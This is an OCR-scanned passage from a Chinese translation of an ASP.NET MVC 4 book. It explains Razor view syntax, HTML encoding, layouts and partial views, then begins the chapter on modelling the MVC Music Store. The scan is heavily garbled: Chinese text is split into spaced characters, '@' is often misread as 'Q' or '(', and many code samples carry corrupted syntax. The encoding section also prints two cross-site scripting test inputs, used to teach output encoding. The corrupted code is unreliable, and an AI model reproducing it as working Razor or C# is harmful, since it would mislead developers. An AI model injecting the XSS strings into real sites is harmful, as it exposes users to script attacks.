还 可 以 通过 将 表达 式 用 圆 括号 括 起 来 以 文 持 显 式 代 码 表 达 式 : 


<span>&@ (rootNamespace) .Models</span> 


这 样 就 告知 了 Razor，.Models 是 字面 量 文 本 ， 而 不 是 代码 表达 式 的 一 部 分 。 
尽管 现在 是 在 介绍 代码 表达 式 ， 但 是 应 该 了 解 一 下 显示 一 个 电子 邮件 地 址 时 的 情况 。 
例如 ， 考 虑 下 面 的 邮件 地 址 是 : 


<span>supportl@megacorp.com</span> 


乍 看 之 下 ， 这 可 能 会 出 现 错误 ， 因 为 @megacorp.com 看 起 来 像 是 一 个 企图 打印 出 变量 
megacorp 的 com 属性 的 有 效 代码 表达 式 。 但 Razor 足够 智能 ， 可 以 辨别 出 电子 邮箱 地 址 的 
- 般 模 式 ， 而 不 会 处 理 这 种 形式 的 表达 式 。 


全 注意 Razor 采 用 了 一 个 简单 算法 来 判别 看 起 来 像 电 子 邮 件 地 址 的 字符 串 
到 底 是 不 是 一 个 有 效 的 邮件 地 址 。 虽 然 它 不 完美 ,但 却 可 以 适用 于 大 多 数 情况 。 
在 一 些 特殊 情况 下 ， 有 效 的 邮件 地 址 可 能 会 显示 不 出 来 , 这 时 可 以 用 两 个 @@ 
符号 转 义 一 个 @ 符 号 。 


但 是 ， 如 果 确 实 想 将 这 种 形式 的 字符 串 作为 一 个 表达 式 ， 该 怎么 办 ? 例如 ， 回 到 这 一 


节 前 面 的 那个 例子 ， 假 设 有 下 面 的 列表 项 : 
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< i>Item Qitem.Length</1i> 


这 种 特殊 情况 下 ， 这 个 表达 式 会 匹配 成 一 个 邮件 地 址 ， 所 以 Razor 将 其 逐 字 打印 。 但 
是 期 望 的 输出 结果 是 : 


<1i>Item 3</1i> 


， 圆 括号 再 次 成 为 救星 。 任 何 时 候 Razor 有 了 二 义 性 ， 都 可 以 用 圆 括号 指明 想 要 
Ng 


<1li>Item @(item.Length)</1i> 


正如 前 面 提 到 的 ， 可 以 使 用 @@ 符 号 来 转 义 @ 符 号 。 这 就 实现 显示 一 些 以 @ 符 号 开头 
的 Twitter 处 理 语句 变 得 简单 : 

<p> 

YOU should follow 

Qhaacked, (Qjongalloway, (bradwilson, (iodetocode 

</p> 


Razor 将 尝试 解析 这 些 隐 式 代 人 码 表 达 式 , 但 会 以 失败 告终 。 这 种 情况 下 ， 应 该 使 用 @@ 
符号 来 转 义 @ 符 号 ， 如 下 代码 所 示 : 
<p> 
You should follow 
QQ@haacked, Qljongalloway, (fbradwilson, Qlodetocode 
</p> 
可 喜 的 是 , 额外 的 圆 括号 和 转 义 序列 很 好 用 到 .。 即便 在 大 型 的 应 用 程序 中 也 很 少 使 用 。 
Razor 视图 引擎 的 设计 理念 就 是 简单 直观 。 不 会 有 复杂 长 瑛 的 语法 规则 ， 为 它 的 应 用 造成 
个 便 。 
3.6.3 HTML 编码 
因为 在 许多 情况 下 都 再 要 用 视图 显示 用 户 输 入， 如 博客 评论 或 产品 评论 等 ， 所 以 总 是 
存在 潜在 的 路 站 脚本 注入 攻击 (也 称 XSS, 这 点 将 在 第 7 章 中 详细 介绍 )。 值 得 称赞 的 是 Razor 
表达 式 是 用 HTML 自动 编码 的 。 
@1{ 
string message = "<script>alert('haacked!');</script>"; 
} 
<span>limessage</span> 
这 段 代 码 将 不 会 弹出 一 个 警告 对 话 框 ， 而 会 呈现 编码 的 HTML: 
<span>&tlt;scriptg&gt;alert (&#39;haacked!g&g#39;);&lt;/script&gt;</span> 
然而 , 如 果 想 展示 HIML 标记 , 就 返回 一 个 System.Web.IHtmlString 对 象 的 实例 , Razor 
并 不 对 它 进行 编码 。 例如 ,本 节 后 和 面 将 要 讨论 的 所 有 视图 辅助 类 都 是 返回 这 个 接口 的 实例 ， 
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因为 它们 想 在 页 面 上 呈现 HTML。 当 然 也 可 以 创建 一 个 HtmlString 实例 或 者 使 用 Html.Raw 
便捷 方法 : 
@1{ 


string message = "<strong>This is bold'i</strong>"; 


} 


<span>Q@Html .Raw (message) </span> 

<span><strong>This is bold'i</strong></span> 

虽然 这 种 自动 的 HTML 编码 通过 对 以 HTML 形式 显示 的 用 户 输入 进行 编码 有 效 地 组 
和 了 XSS 的 脆弱 性 ， 但 是 对 于 在 JavaScript 中 显示 用 户 输入 来 说 还 是 不 够 的 。 

例如 : 


<Sscript type="text/javascript"> 
$s (function () 1{ 


Var message = "Hello (ViewBag.Username'; 
$ ("#message") .html (message) .show('slow"');} 
}); 
</script> 


在 这 上 段 代 人 码 中 ,将 一 个 字符 串 赋 给 了 JavaScript 变量 message， 而 有 昌 该 鱼 符 串 中 包含 了 
用 户 通 过 Razor 表达 式 提 供 的 用 户 名 。 

通过 jQuery 的 HIML 方法 ,变量 message 将 被 设置 为 一 个 ID 属性 值 为 "message" 的 DOM 
元 素 。 尽 管 在 message 字符 串 中 对 用 户 名 进行 了 HTML 编码 ， 但 是 仍然 具有 潜在 的 XSS 
脆弱 性 。 例如 ， 如果 用 户 提 供 以 下 的 字符 串 作 为 用 户 名 , HTML 将 被 设置 为 一 个 脚本 标签 : 


\X3cscript\x3e$®$20alert (\x27pwnd\x271)®%20\x3c/script\x3e 


当 在 JavaScript 中 将 用 户 提 供 的 值 赋 给 变量 时 , 要 使 用 JavaScript 字符 串 编码 而 不 仅仅 
是 HTML 编码 ， 记 住 这 一 点 是 很 重要 的 。 也 残 是 要 使 用 @Ajax.JavaScriptStringEncode 方法 
对 用 户 输入 进行 编码 。 下 面 是 使 用 了 这 个 方法 的 相同 代码 ， 这 样 就 可 以 有 效 地 避免 XSS 
攻击 : 


<script type="text/javascript"> 
$s (function () 1{ 
var message = "Hello 
QAjax.JavascriptstringEncode (ViewBag.Username) '; 
5 ("#message") .html (message) .show('slow"'); 
}); 


</script> 
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注意 ”理解 HTML 和 JavaScript 编码 的 安全 隐患 是 很 重要 的 。 不 正确 的 编 
码 会 使 网 站 和 用 户 处 在 危险 境地 。 这些 内 容 在 第 7 章 会 进行 详细 探讨 。 


3.6.4 代码 块 


Razor 在 视图 中 除了 支持 代码 表达 式 以 外 ， 还 文 持 代码 块 。 回 顾 前 面 的 视图 示例 ， 其 
中 有 一 条 foreach 语句 : 
Qforeach (var item in stuff) 1{ 


< 1>The item name jis liitem.</l1i> 


} 


这 段 代 码 迭 代 了 一 个 数组 ， 并 为 数组 中 的 每 一 项 显示 了 一 个 列表 项 元 素 。 

这 个 语句 有 趣 的 地 方 是 ，foreach 语句 会 目 动 转换 为 带 有 起 始 <]i> 标 签 的 标记 。 当 看 到 
这 段 代 码 时 ， 它 们 有 时 可 能 会 假定 是 换行 符 导 致 了 这 个 转换 的 发 生 ， 但 是 下 面 有 效 的 代码 
片段 证 实 了 情况 并 非 如 此 : 


Qforeach (var item in stuff) {<li>The item name is fitem.</l1i>} 


因为 Razor 理解 HIML 标记 语言 的 结构 ， 抽 以 当 <li> 标 签 天 闭 时 它 也 可 以 自动 地 转 回 
代码 。 因 此 ， 这 里 不 需要 划 定 右 花 括号 。 

相 比 之 下 ， 对 十 同样 用 于 代码 和 标记 之 间 转 换 的 代码 ，Web Forms 视图 引擎 束 不 得 不 

< foreach (var item in stuff) { > 

<1i>The item name is <%®: item $3>.</l1i> 

达 告 上 竺 > 

代码 块 (有 时 是 一 个 代码 块 ) 除 了 需要 @ 符 号 分 割 之 外 还 需要 使 用 花 括 号 。 下面 是 一 个 
多 行 代码 块 的 例子 : 

Qf 

string ss = "One line of code.™}; 


ViewBag.Title “ Another line of code"™} 
} 


另外 一 个 例子 是 当 调用 没有 返回 值 的 方法 (也 就 是 返回 类 型 为 void) 时 : 

afHtml .RenderPpartial ("SomePartial™");} 

注意 代码 块 中 的 语句 (比如 foreach 循环 和 站 代码 块 中 的 语句 ) 是 不 需要 使 用 花 括号 的 ， 
因为 Razor 引擎 有 这 些 C# 关 键 字 的 专门 知识 。 

下 节 将 对 简洁 Razor 语法 进行 快速 介绍 ， 并 展示 各 种 Razor 语法 及 其 与 Web Forms 的 
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对 比 。 
3.6.5 ”Razor 语法 示例 


本 节 通 过 对 Razor 示例 和 使 用 Web Forms 视图 引擎 语法 的 相同 示例 进行 比较 ， 来 说 明 
Razor 语法 。 每 个 示例 都 强调 了 一 个 特定 的 Razor 概念 。 


1. 隐 式 代码 表达 式 


如 前 所 述 ， 代 码 表达 式 将 被 计算 并 将 值 写 入 到 啊 应 中 ， 这 就 是 在 视图 中 显示 值 的 一 般 
原理 。 隐 式 代码 表达 式 在 Razor 和 Web Forms 中 的 对 比如 下 所 示 : 

® Razor: <span>(Wmodel.Message</span> 

® WebForms: <span><%: model.Message %></span> 

Razor 中 的 隐 式 代码 表达 式 总 是 采用 HTML 编码 方式 。Web Forms 语法 也 是 目 动 对 值 
进行 HTML 编码 。 

2. 显 式 代码 表达 式 


如 前 所 述 ， 代 人 码 表 达 式 的 值 将 被 计算 并 写 入 到 啊 应 中 ， 这 就 是 在 视图 中 显示 值 的 一 般 
原理 。 显 式 代 码 表达 式 在 Razor 和 Web Forms 中 的 对 比如 下 所 示 : 

e Razor: <span>ISBN(V(1sbn)</span> 

® WebForms: <span>ISBN<%: 1sbn %></span> 


3. 无 编码 代码 表达 式 
有 些 情况 下 ， 需 要 明确 地 泻 染 一 些 不 应 该 采用 HIML 编码 的 值 ， 这 时 可 以 采用 


Html.Raw 方法 来 保证 该 值 不 被 编码 。 访 方法 在 Razor 和 Web Forms 中 的 对 比如 下 所 示 : 
® Razor: <sSpan>( 人 HtmlRaw(model.Message)<'/Span> 
® Web Forms: <span><%: Html.Raw(model.Message) %></span> 
或 


<span><%= model.Message %></span> 


4. 代码 块 


不 像 代 码 表达 式 先 求 得 表达 式 的 值 ， 然 后 再 输出 到 啊 应 ， 代 码 块 是 简单 的 执行 代码 部 
分 。 这 一 点 对 于 声明 以 后 要 使 用 到 的 变量 是 有 帮助 的 。Razor 和 Web Forms 中 的 代 但 块 对 
比如 下 所 示 : 
® Razor: (D1{ 
int x = 123: 


strng y = "because."; 
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® Web Forms: <% 
int x = 123:; 
string y = "because.": 
0> 


5. 文本 和 标记 相 结 合 
这 个 例子 通过 对 比 Razor 和 Web Forms 来 展示 混用 文本 和 标记 的 概念 ， 具 体 如 下 : 


® Razor: (toreach (Var item In items) { 
<span>Item (Vitem.Name.</span> 
} 
® WebForms: <% foreach (var ltem In items) { %> 
<span>ltem <%: item.Name %>.</span> 
<% } %0> 


6. 混合 代码 和 纯 文本 


Razor 碍 找 标签 的 开始 位 置 以 确定 何 时 将 代码 转换 为 标记 。 然 而 ， 有 时 可 能 想 在 一 个 
代码 块 之 后 立即 输出 纯 文 本 。 例 如 ， 在 下 面 的 这 个 例子 中 就 是 展示 如 何在 一 个 条 件 语句 块 
中 显示 纯 文 本 。Razor 和 Web Forms 中 的 对 比如 下 所 示 : 

® Razor: (Dif (showMessage) { 

<text>This 1s plaimn text</text> 

} 

(Dif (showMessage) { 

(@:This 1s plam text. 
} 
® WebForms: <% 1f (showMessage) { %> 
This 1s plam text. 

<% } %> 

注意 Razor 可 及 用 两 种 不 同 的 方式 来 混合 代码 和 纯 文 本 。 第 一 种 方式 是 使 用 <text> 标 
签 ， 这 样 只 是 把 标签 内 容 写 入 到 啊 应 中 ， 而 标签 本 上 身 则 不 与 入 。 笔 者 个 人 喜欢 采用 这 种 方 
式 ， 因 为 它 具 有 逻辑 意义 。 如 果 想 转 回 标记 ， 只 需要 使 用 一 个 标签 就 行 了 。 

其 他 一 些 人 喜欢 第 二 种 方式 ， 该 方式 使 用 一 种 特殊 的 语法 ， 来 实现 从 代码 到 纯 文 本 
的 转换 ， 但 是 这 种 方法 每 次 只 能 作用 于 一 行文 本 。 

7. 转 义 代码 分 隔 符 


下 如 本 章 前 面 所 转述 的 ， 可 以 用 “@@” 来 编 怒 “@” 以 达到 显示 “@” 的 目的 。 此 
让， 始终 都 可 以 选择 使 用 HTML 编码 来 实现 。 Razor 和 Web Forms 中 的 转 义 代码 分 隔 符 的 
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对 比如 下 所 示 : 
® Razor: My Twitter Handle 1s &#64:hacked 
My Twitter Handle ls Ohaacked 


® WebForms: &lt:% expresslion %&et: marks a code nugeget. 
8. 服务 器 端的 注释 


Razor 为 注释 一 块 代 码 和 标记 提供 了 美观 的 语法 。 服 务 器 端的 注释 在 Razor 和 Web 
Forms 中 的 使 用 情况 如 下 所 示 : 
® Razor: (OO* 
This 1s a multiline server side comment. 
(Dif (showMessage) { 
<hl>(0ViewBag.Message</h1> 
} 
All of this ls commented out. 
“@ 
® WebForms: <%-- 
This ls a multiline server side comment. 
<% 1f (showMessage) { %> 
<hl><%: ViewBage.Message %></h1> 
<% } %> 
All of this 1s commented out. 


一 人 > 
9. 调用 泛 型 方法 


这 与 显 式 代码 表达 式 相 比 基 本 上 没有 什么 不 同 。 即 便 如 此 ， 在 试图 调用 泛 型 方法 时 仍 
有 许多 人 面临 困境 。 困 惑 主 要 在 于 调用 泛 型 方法 的 代码 包含 尖 插 号 。 正 如 前 面 学 习 的 ， 尖 
括号 会 导致 Razor 转 回 标记 ， 除 非 整 个 表达 式 用 圆 括号 括 起 来 。Razor 和 Web Forms 中 的 
泛 型 使 用 对 比如 下 所 示 : 

® Razor: (VW(Html.SomeMethod<AType>()) 

e Web Forms: <%: Html.SomeMethod<AType>() %> 


3.6.6 布局 
Razor 的 布局 有 助 于 使 应 用 程序 中 的 多 个 视图 保持 一 人 致 的 外 观 。 如 果 熟 悉 Web Forms 的 
话 ,， 其 中 母 版 页 和 布局 的 作用 是 相同 的 , 但 是 布局 提供 了 更 加 简洁 的 语法 和 更 大 的 灵活 性 。 
可 使 用 布局 为 网 站 定义 公共 模板 (或 只 是 其 中 的 一 部 分 )。 公 共 模 板 包 含 一 个 或 多 个 占 
位 符 ， 应 用 程序 中 的 其 他 视图 为 它 ( 们 ) 提 供 内 容 。 从 某 些 角度 来 看 ， 布 局 很 像 视 图 的 抽象 
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下 面 来 看 一 个 非 贡 简单 的 布局 。 这 里 称 这 个 布局 文件 为 SiteLayout.cshtml; 


<lIDOCTYPE html> 
<html> 
<head><title>lVviewBag.Title</title></head> 
<body> 

<hl>@ViewBag.Title</hl> 

<div id="main-content">@RenderBody()</div> 
</body> 
</html> 


它 看 起 来 像 一 个 标准 的 Razor 视图 ， 但 需要 注意 的 是 在 视图 中 有 一 个 @RenderBody 调 
用 。 这 是 一 个 占 位 符 ， 用 来 标记 使 用 这 个 布局 的 视图 将 泻 染 它们 的 主要 内 容 的 位 置 。 多 个 
Razor 视图 现在 可 以 利用 这 个 布局 来 显示 一 致 的 外 观 。 

接 下 来 看 一 个 使 用 这 个 布局 的 例子 Index.cshtml; 


Et 
Layout = "~/Views/Shared/SiteLayout.cshtml™"; 
View.Title = "The Index!"; 

} 


<p>This is the main contentl</p> 


上 面 的 这 个 视图 通过 Layout 属性 来 指定 布局 。 当 泻 染 这 个 视图 时 ， 它 的 HTML 内 容 
将 被 放 在 SiteLayout.cshtml 中 id 属性 值 为 main-content 的 DIV 元 素 中 , 最 后 生成 的 HTML 
标记 如 下 所 示 : 


<lIDOCTYPE html> 
<htm > 
<head><title>The Index!</title></head> 
<body> 
<hl>The Index!</hl1> 
<div id="main-content"><p>This Is the main content'i</p></div> 
</body> 
</html> 


注意 视图 内 容 ， 其 中 标题 和 hl 标题 都 被 标记 为 粗 体 显示 以 强调 这 些 都 是 由 视图 提供 
的 ， 除 此 之 外 的 所 有 其 他 内 容 都 由 布局 提供 。 

布局 可 能 有 多 个 节 。 人 例如， 下面 示 例 在 前 面 的 布局 SiteLayout.cshtml 的 基础 上 添加 一 
个 页 脚 节 : 


<IDOCTYPE html> 
<html> 
<head><title>@ViewBag.Title</title></head> 
<body> 
<hl>@ViewBag.Title</hl> 
<diy id="main-content">@RenderBody()</div> 
<footer>@RenderSection ("Footer")</footer> 
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</body> 
</html> 
在 不 做 任何 改变 的 情况 下 再 次 运行 前 面 的 视图 ， 将 会 抛 出 一 个 异常 ， 提 示 没 有 定义 
Footer 节 。 默 认 情 况 下 ， 视 图 必须 为 布局 中 定义 的 每 一 个 节 提 供 相 应 内 容 。 
这 是 更 新 后 的 视图 ， 如 下 所 示 : 
@1{ 
Layout = "~/Views/shared/siteLayout.cshtml"; 


View.Title = "The Indexl!l™. 
} 


<p>This is the main content!</p> 


Qsection Footer I 
This is the <strong>footer</strong>. 
} 


(@section 语法 为 布局 中 定义 的 一 个 市 指定 了 内 容 。 

刚才 指出 : 默认 情况 下 ， 视 图 必须 为 布局 中 定义 的 每 一 个 厄 提 供 内 容 。 那 么 当 问 一 个 
布局 中 添加 一 个 新 节 时 会 如 何 ? 这 样 会 使 引用 该 布局 的 每 一 个 视图 都 不 能 正音 运行 吗 ? 

然而 ，RenderSection 方法 有 一 个 重 载 版 本 ， 人 允许 指定 不 需要 的 节 。 可 以 给 required 参 
数 传递 一 个 false 值 来 标记 Footer 节 是 可 选 的 : 


<footer>QRenaderSection("Footer"”，TFreduired，[ftalse)</ foocteTr> 


但 是 ， 如 果 能 为 视图 中 没有 定义 的 节 ， 定 义 一 些 默认 内 容 ， 电 不 更 好 ? 这 里 提供 了 一 
个 方法 ， 虽 然 有 点 索 琐 ， 但 还 是 能 用 : 


<footer> 
Qif (IsSectionDefined("Footer™")) 1{ 
RenderSection("Footer™.);} 
} 
else | 
<span>This is the default footer.</span> 
} 


</footer> 


第 15 章 会 介绍 Razor 语法 的 一 个 高 级 特性 ， 称 为 模板 Razor 委托 ， 利 用 它 可 以 实现 一 
个 更 好 的 方法 来 解决 这 个 问题 。 


MVC 4 中 默认 的 布局 变化 


有 一 些 基本 样式 的 默认 布局 。 在 MVC 4 之前， 默认 模板 的 设计 非常 Spartan 一 一 在 赣 色 的 
背景 上 只 有 一 片 白色 区 域 。 

正如 第 1 章 中 讲 到 的 ，MVC 4 对 默认 的 模板 进行 了 彻底 地 重新 编写 ， 提 供 了 更 好 的 可 
视 化 设计 。 除 了 简单 的 美观 之 外 ， 新 的 HIML 和 CSS 能 够 适用 于 不 同 的 屏幕 宽度 (包括 小 
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型 的 移动 浏览 器 )。 这 一 目 适 应 的 设计 采用 了 现代 Web 标准 , 比如 CSS 媒体 得 询 (CSS Media 
Queries)。 第 15 章 会 对 这 些 内 容 进 行 详细 介绍 。 


3.6.7f ViewStart 


在 前 面 的 例子 中 , 每 一 个 视图 都 是 使 用 Layout 属性 来 指定 它 的 布局 。 如 果 多 个 视图 使 
用 同一 个 布局 ， 束 会 产生 见 余 ， 并 且 很 难 维护 。 
_ViewStart.cshtml 页 面 可 用 来 消除 这 种 元 余 。 这 个 文件 中 的 代码 先 于 同 目录 下 任何 视 
图 代码 的 执行 。 这 个 文件 也 可 以 递归 地 应 用 到 子 目 录 下 的 任何 视图 。 
当 创 建 一 个 默认 的 ASPNET MVC 项 目 时 ， 您 将 会 注意 到 在 Views 目录 下 会 自动 添加 
-个 _ViewStart.cshtml 文件 ， 它 指定 了 一 个 默认 布局 。 
@i{ 


Layout = "~/Views/Shared/ Layout.cshtml™"; 
} 


因为 这 个 代码 先 于 任何 视图 运行 ， 所 以 一 个 视图 可 以 重 写 Layout 属性 的 默认 值 ， 从 而 
重新 选择 一 个 不 同 的 布局 。 如 打 一 组 视图 拥有 共同 的 设置 ， 那 么 _ViewStartcshtml 文件 就 
有 了 用 武之 地 ， 因 为 我 们 可 以 在 它 里 面 对 共 同 的 视图 配置 进行 统一 设置 。 如 条 有 视图 需要 
履 疝 统一 的 设置 ， 我 们 只 需 修 改 对 应 的 属性 值 即 可 。 


3.7 指定 部 分 视图 


除了 返回 视图 之 外 ， 操 作 方 法 也 可 以 通过 PartialView 方法 以 PartialViewResult 的 形式 
返回 部 分 视图 。 下 面 是 一 个 例子 : 


public class HomeController : Controller 1{ 
Public ActionResult Message() 1 
ViewBag.Message = "This 1is a partjal view."; 
return PartialView(): 


} 


这 种 情形 下 , 泻 染 的 是 视图 Message.cshtml, 但 是 如 果 布 局 是 由 _ViewStart.cshtml 页 面 
指定 (而 不 是 直接 在 视图 中 ) 的 ， 将 无 法 演 染 布局 。 
除了 不 能 指定 布局 之 外 ， 部 分 视图 看 起 来 和 正常 视图 没有 分 别 : 
<h2>@ViewBag.Message</h2> 
当 在 使 用 Ajax 技术 进行 部 分 更 新 时 ， 部 分 视图 是 很 有 用 的 。 下 向 展示 了 一 个 非常 重 单 
的 例子 ， 使 用 jQuery 将 一 个 部 分 视图 的 内 容 加 载 到 一 个 使 用 了 Ajax 调用 的 当前 视图 中 : 


<div id="result"></div> 
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<script type="text/javascript"> 
$s (function()t 
$s('#result') .load('/home/message'); 

}); 

</script> 

前 面 的 代码 使 用 jQuery 的 load 方法 向 Message 操作 方法 发 出 一 个 Ajax 请 求 ， 而 后 使 
用 请 求 的 结果 更 新 id 属性 值 为 result 的 DIV 元 素 。 

想 要 看 到 前 面 两 节 中 描述 的 指定 视图 和 分 部 视图 的 例子 , 可 以 使 用 NuGet 将 Wrox. 
ProMvc4.Views.SpecifyingViews 包 安 装 到 一 个 默认 的 ASPNET MVC 4 项 目 中 , 像 下 面 这 样 : 


TInstal1L-Package Wrox.ProMvc4.Views.SpecifyingViews 


这 将 在 项 目的 示例 目录 下 添加 一 个 包含 有 多 个 操作 方法 的 控制 磺 示 例 ， 每 一 个 操作 方 
法 以 不 同 的 方式 指定 一 个 视图 。 在 项 目 中 按 下 Ctrl+F5 键 并 分 别 访问 下 述 目 录 运 行 这 些 示 
例 操 作 方 法 : 

® /sample/index 

® /sample/index? 

® /sample/index3 


® /sample/partialviewdemo 
3.8 人 小结 


视图 引擎 的 用 途 非常 具体 有 限 。 它 们 的 目的 是 获取 从 控制 器 传递 给 它们 的 数据 ， 并 生 
成 经 过 格式 化 的 输出 ， 通 常 是 HTML 格式 。 除 了 这 些 简单 的 职责 或 “关注 点 ”之 外 ， 作 为 
开发 人 员 ， 还 可 以 以 任意 想 要 的 方式 来 实现 视图 的 目标 。Razor 视图 引擎 简单 直观 的 语法 
使 得 编写 丰富 安全 的 页 面 极其 容易 ， 而 不 必 考虑 编写 页 面 的 难 易 程度 。 
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本 章 主要 内 容 
e 如 何 为 MVC Music Store 建 模 
。 基 架 的 含义 

e 编辑 专辑 的 方法 

。 模型 绑 定 


模型 这 个 词 在 软件 开发 领域 被 多 次 引用 ， 代 表 数 百 种 不 同 的 概念 ， 如 成 熟 度 模型 、 设 
计 模 型 、 威 胁 模 型 和 进程 模型 等 。 很 少 有 开发 会 议会 目 始 至 终 都 不 谈 一 两 种 模型 的 。 即 便 
把 “模型 ”这 个 术语 的 范围 限定 在 MVC 设计 模式 的 上 下 文中 ， 也 仍然 可 以 探讨 面 癌 业务 
的 模型 对 象 和 面 癌 视图 的 模型 对 象 哪个 更 具 优势 (第 3 章 中 讨论 了 这 方面 的 内 容 )。 

章 要 讨论 的 是 那些 发 送信 息 到 数据 库 , 执行 业务 计算 并 在 视图 中 渲染 的 模型 对 象 。 换 句 

话说 ， 这些 对 象 代表 大 应 用 程序 关注 的 域 , 模型 就 是 要 显示 、 保存 、 创建 、 更 新 和 删除 的 对 象 。 

为 了 仅 使 用 模型 对 象 的 定义 束 能 构建 出 应 用 程序 特性 , ASPNET MVC 4 提供 了 许多 工 
具 和 特性 。 现 在 就 应 该 坐 下 来 好 好 想 一 想 要 解决 的 问题 (比如 怎样 让 一 个 用 户 购 买 音乐 )， 
然后 为 了 呈现 涉及 的 主要 对 象 ， 就 要 编写 一 些 人 简单 的 C# 类 ， 比 如 Album 类 、ShoppingCart 
类 和 User 类 。 准备 好 了 上 面 的 工作 , 接 下 来 就 可 以 使 用 MVC 提供 的 工具 来 为 每 个 模型 对 象 
的 标准 索引 、 创建、 编辑 和 删除 功能 构建 控制 右 和 视图 。 这 个 构建 工作 称 为 基 架 (scaffolding)， 
在 讨论 基 架 之 前 ， 需 要 首先 了 解 一 些 模型 。 


4.1 为 MVC Music Store 建 模 


假设 要 从 头 开 始 构建 MVC Music Store。 与 其 他 所 有 应 用 程序 一 样 ， 从 Visual Studio 
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中 选择 File | New Project 菜单 命令 , 给 项 目 命名 , 之 后 Visual Studio 会 打开 如 图 4-1 所 示 的 
对 话 框 。 在 对 话 框 中 选择 Internet Application 项 目 模板 。 


ET ny Fe 
New ASPA El VC4P 


Frohect Template 


| & chef wult ASP.NET MVC d project with gn 
| account controller that uses formmms 
rt tna | authentication, 
Apphcabon Appheatmwn | 


A Crente a unit test project 
Test project name: 

Nhrel MusieStore, Tesits 

Test framevortc 

Visual Studie Unit Test 


图 4-1 


Internet Application 项 目 模板 提供 了 局 动 应 用 程序 需要 的 所 有 项 (如 图 4-2 所 示 ): 一 个 
基本 的 布局 视图 ， 一 个 带 有 用 户 登 录 链 接 的 默认 首页 ， 一 个 初始 的 样式 表 和 一 个 相对 较 
空 的 Models 文件 夹 。Models 文件 夹 下 只 有 一 个 AccountModels.cs 文件 , 里 面包 含 了 了 一些 
用 来 管理 账户 的 视图 专属 的 模型 类 (这 些 类 是 专门 为 注册 、 登 录 和 修改 密码 的 视图 提供 的 )。 


| 省 oO-t 人 0 , 
Seareh Sobution Eplorer (Cherts:) Pp: | 


Wm] Solution ‘MvcMusicStore’ (2 projects) 
a Ej MveMusicStore 
b ££ Properies 
b mm References 
i App_Data 
b 国 App_Start 
b Content 
b 国 Controllers 
b Images 
4 六 Models 
b c= AccountMedels.es 
b Bl Scrpts 
b ml Views 
BB fawiccnjico 
b dd Global.asar 
DD packages.config 
hb Web.config 
a [MvelMusiedtore.T 
b pp Properties 
b wa Neferences 
b ml Controllers 
人 App.config 
内 packages.config 
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为 什么 Models 文件 夹 儿 乎 是 空 的 呢 ? 这 是 因为 项 目 模板 不 知道 我 们 在 哪个 域 中 工作 ， 
也 不 知道 我 们 想 要 解决 什么 样 的 问题 。 

这 个 时 候 ， 可 能 连 我 们 自己 也 不 明确 究竟 要 解决 什么 问题 ! 这 就 需要 与 客户 和 业务 负 
责 人 进行 沟通 交流 ， 做 一 些 初步 的 原型 设计 或 者 使 用 测试 驱动 开发 来 充实 设计 。ASPNET 
MVC 框架 并 没有 规定 初始 阶段 的 过 程 和 方法 。 

最 终 可 能 决定 要 构建 的 音乐 商店 首先 应 具有 列举 、 创建 , 编辑 和 删除 专辑 信息 的 功能 。 
可 以 用 下 和 面 的 这 个 类 来 为 专辑 建 模 : 


public class Album 


{ 
public virtual int AlbumId { get; set; |} 
public virtual int GenrelId { gets set; 上 
public virtual int ArtistId { get; set; } 
public virtual string Title { get; set; } 
public virtual decimal Price { get; set; } 
public virtual string AlbumArtUrl 1{ get; set; } 
public virtual Genre Genre { get; set; } 
public virtual Artist Artist { get; set; } 


} 


专辑 模型 的 主要 目的 是 模拟 音乐 专辑 的 特性 ， 如 标题 和 价格 。 每 一 个 专辑 也 都 有 一 个 
与 之 相关 的 艺术 家 : 


public class Artist 
{ 


public virtual int ArtistlId 1{ get; set; } 
public virtual string Name { getr sets; } 
} 
从 上 面 的 代码 中 可 能 会 注意 到 ， 每 个 Album 都 有 Artist 和 ArtistId 两 个 属性 来 管理 与 
之 相关 的 艺术 家 。 这 里 ，Artist 属性 称 为 导航 属性 (navigational property)， 主 要 是 因为 对 于 
-个 专辑 ， 可 以 通过 点 操作 符 来 找到 与 之 相关 的 艺术 家 (favoriteAlbum.Artist)。 
这 里 称 ArtistId 属性 为 外 键 属性 (foreign key property)， 如 果 了 解 一 点 数据 库 知 识 的 话 ， 
就 会 知道 艺术 家 和 专辑 会 被 保存 在 两 个 不 同 的 表 中 ， 并 且 一 个 艺术 家 可 能 与 多 个 专辑 有 关 
联 。 因 为 艺术 家 记录 表 和 专辑 记录 表 存 在 独 外 键 关 系 ， 所 以 这 里 就 将 艺术 家 的 外 键 值 艇 入 
到 了 专辑 的 模型 中 。 


因为 外 键 是 关系 型 数据 库 管 理 的 实现 细节 ， 所 以 一 些 读者 可 能 不 喜欢 在 模型 中 利用 外 


键 属性 。 在 模型 对 象 中 并 不 是 必须 使 用 外 键 属性 ， 所 以 可 以 不 考虑 它 。 
因为 外 键 可 以 为 将 要 使 用 的 工具 提供 很 多 便利 ， 所 以 在 本 章 利 用 了 外 键 属性 。 


个 专辑 还 会 有 一 个 相关 的 流派 ， 一 种 流派 也 会 对 应 一 个 相关 专辑 列表 。 
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public class Genre 


{ 
public virtual int GenrelId { get; set; } 
public virtual string Name 1 get; set; } 
public virtual string Description 1{ get; set; 上 } 
public virtual List<Album> Albums { gets;s sets; } 


} 

这 里 可 能 会 注意 到 所 有 的 属性 都 是 virtual 类 型 的 ， 本 章 后 面 将 会 讨论 这 个 问题 。 到 月 
前 为 止 ， 这 三 个 简单 类 的 定义 就 是 建立 模型 的 开端 ， 其 中 包含 了 利用 基 架 生成 控制 硕 和 一 
些 视图 ， 甚 全 是 创建 数据 库 南 要 的 所 有 内 容 。 


4.2 为 商店 管理 器 构造 基 染 


接 下 来 创建 商店 管理 器 ， 这 是 一 个 可 用 来 编辑 专辑 信息 的 控制 占 。 在 新 的 解决 方案 中 
右 击 Controllers 文件 来， 选择 Add Controller 选项 ， 在 弹出 的 对 话 框 中 (如 图 4-3 所 示 )， 设置 
控制 恬 名 称 和 基 架 选项 。 截 图 中 选择 的 基 架 模板 需要 一 个 模型 类 和 一 个 数据 上 下 文 。 


Add Controller 


PE 
Controller name: 
torelManagerController 
Scaffolding options 
! Template: 
MYC controller with read/write actions and wews using Entity Framework w 


Model class: 
Album ww 


Data context class: 


Razor (CSHTIMAL) Ww Advanced Options... 


| add Cancel 


4.2.1 基 架 的 含义 


ASPNET MVC 中 的 基 架 可 以 为 应 用 程序 的 创建 、 读 取 、 更 新 和 删除 (CRUD) 功 能 生成 
